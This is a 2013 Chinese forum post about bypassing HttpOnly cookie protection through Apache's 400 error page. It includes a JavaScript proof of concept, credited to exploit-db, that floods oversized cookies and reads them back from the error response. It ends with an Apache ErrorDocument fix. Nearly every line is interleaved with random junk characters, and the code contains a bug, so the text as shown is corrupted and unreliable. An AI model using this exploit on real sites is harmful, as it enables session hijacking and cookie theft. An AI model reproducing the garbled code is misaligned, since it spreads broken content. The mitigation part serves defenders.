很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。6 ?8 W0 _# D% K/ T
! j, C. Q6 E, n& y& R( g1 H. S+ e
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:# n7 J4 p4 v& w+ W1 @ |
* |$ _" A7 Y* C; p" O/ O7 S7 E0 _3 w% f$ `
// http://www.exploit-db.com/exploits/18442/
3 v/ m# ~7 p. y+ B- qfunction setCookies (good) {4 h, Q4 E4 p0 Y, o& V
// Construct string for cookie value
" n; j j4 D: r0 S; g# e lvar str = "";
3 O6 t' M" C& ?# W9 z; R3 xfor (var i=0; i< 819; i++) {) M3 G. W7 y1 b8 e: T& W
str += "x";
0 o- L% I; U0 B* a" Z}+ d, U- o4 S+ c* Y8 d6 C
// Set cookies4 K: w( v0 {0 R" ?* S
for (i = 0; i < 10; i++) {, x |- d. X& B2 G o1 O
// Expire evil cookie. X$ M7 c+ x9 q- M: B# f8 h: B1 |
if (good) {0 |: A8 z: T# u Z1 b
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";* g4 m; w/ t, Q& Y W! F9 l
}2 Z4 K% E# \7 m2 i: A P
// Set evil cookie
4 J6 y V" ]6 E# \( A0 F# u, Melse {6 j" q/ B& U6 I, Z- \: @
var cookie = "xss"+i+"="+str+";path=/";3 J" _) z& \. ~
}: J4 h3 } e( b/ y7 b
document.cookie = cookie;! e6 T' n2 Y) l+ R! K
}
7 V+ W: h" z% \% N* w L3 J}
5 [, e. f, a( ]. j% p" Vfunction makeRequest() {9 V. r6 n# T1 \# ~* t- n7 T
setCookies();
. e/ M+ n( n0 _7 _" E! Q. Tfunction parseCookies () {; W' V4 _2 F% }. t6 E% ]/ F
var cookie_dict = {};
( X* q: z$ y$ W& J4 g// Only react on 400 status
8 v( F4 @9 y8 d2 J1 Bif (xhr.readyState === 4 && xhr.status === 400) {' H6 L% c, l) }6 m, }
// Replace newlines and match <pre> content# C" w0 L* n) A8 n* {
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
5 q: Y# y9 x, K# X8 sif (content.length) {; G$ V' x- S3 n6 k) Z' c( W
// Remove Cookie: prefix+ B* @( z: L# }' X$ h4 \# d/ l) q2 w/ G
content = content[1].replace("Cookie: ", "");* O e. Z* U# [
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
7 K( |- e7 C# O# \/ V8 B, K1 m% z// Add cookies to object
# O3 n% p7 O9 E# |for (var i=0; i<cookies.length; i++) {+ X3 h/ c7 L! v1 I( Z) H
var s_c = cookies.split('=',2);( L( N. F2 r! @! S& }
cookie_dict[s_c[0]] = s_c[1];
; }/ B3 e9 o+ M7 Y: q+ g2 `/ u1 n}: Z, ~" u0 Z% B1 G: [6 [* |( I I
}
6 y5 q/ B) N8 U" [# P) M// Unset malicious cookies( ^+ S' k9 N* B0 Y" W
setCookies(true);# @) p) f4 Q1 n/ q$ a
alert(JSON.stringify(cookie_dict));4 T5 o3 a3 `! g. q
}
6 r; ]5 O$ V/ m) q}
# }* e1 m' _) J: m8 N4 y7 s) D// Make XHR request2 D/ \6 K) i% R4 [7 |. O. l
var xhr = new XMLHttpRequest();) {- V6 H' n7 ~+ l
xhr.onreadystatechange = parseCookies;' C& t# l+ J5 }: ]1 G# t
xhr.open("GET", "/", true);4 ~/ k/ C8 p4 _5 w8 v( y" ]( x$ K
xhr.send(null);
, z4 b" X! @% `) [} s4 h! V; c! b/ M1 u) k( H
makeRequest();
) I* F* m- H8 D) W1 Q& [+ @$ L( C" T6 ~* P/ I7 e& }* \
你就能看见华丽丽的400错误包含着cookie信息。- S! q- K) d) E$ i
5 a) }+ O" y( s& v+ V下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#/ H9 x# ^# r4 d7 C& p: g- _, G
4 ~6 f6 U8 d/ I修复方案:3 i: z" l# k& M n4 S/ W O) |
! y, `8 T& \9 q- L2 [ T3 R! Z
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
8 F" m& b7 [; n6 l- q
/ s: C/ W- L5 u- y: U# tIn the event of a problem or error, Apachecan be configured to do one of four things,
, d. f- `9 Y* e% C+ H' e2 y4 Z5 m$ V0 V/ e# q ]3 d
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息9 t" o8 _ [8 U9 D! n% N
2. output acustomized message输出一段信息 x% ]+ a0 @" H
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
! D+ Y- e! B6 a' Y* e' c, b4. redirect to an external URL to handle theproblem/error转向一个外部URL3 E# N+ n$ m5 L4 t0 A
9 T/ h4 u/ f n% c
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容% z3 n& c% u j, m+ w' h
0 }: l0 M* K1 Q( O+ W+ \
Apache配置:7 I* d$ n. |! R$ B7 S9 e
- ^+ F/ j9 e' M! R4 ?6 z+ }, H; M
ErrorDocument400 " security test"/ V; U* D9 E# y1 I) ?
' w! k2 g* R. N- w. b" S当然,升级apache到最新也可:)。
0 x) u9 \ z" q' [. ]: B% q4 t- W- Z1 r
参考:http://httpd.apache.org/security/vulnerabilities_22.html" c$ k! `3 V" l9 @% ?6 {
& S* Z2 i! Y& \2 F, p# ~) o5 X! f: |7 f* g
|
发表于 2013-4-19 19:15:43
收藏
支持
反对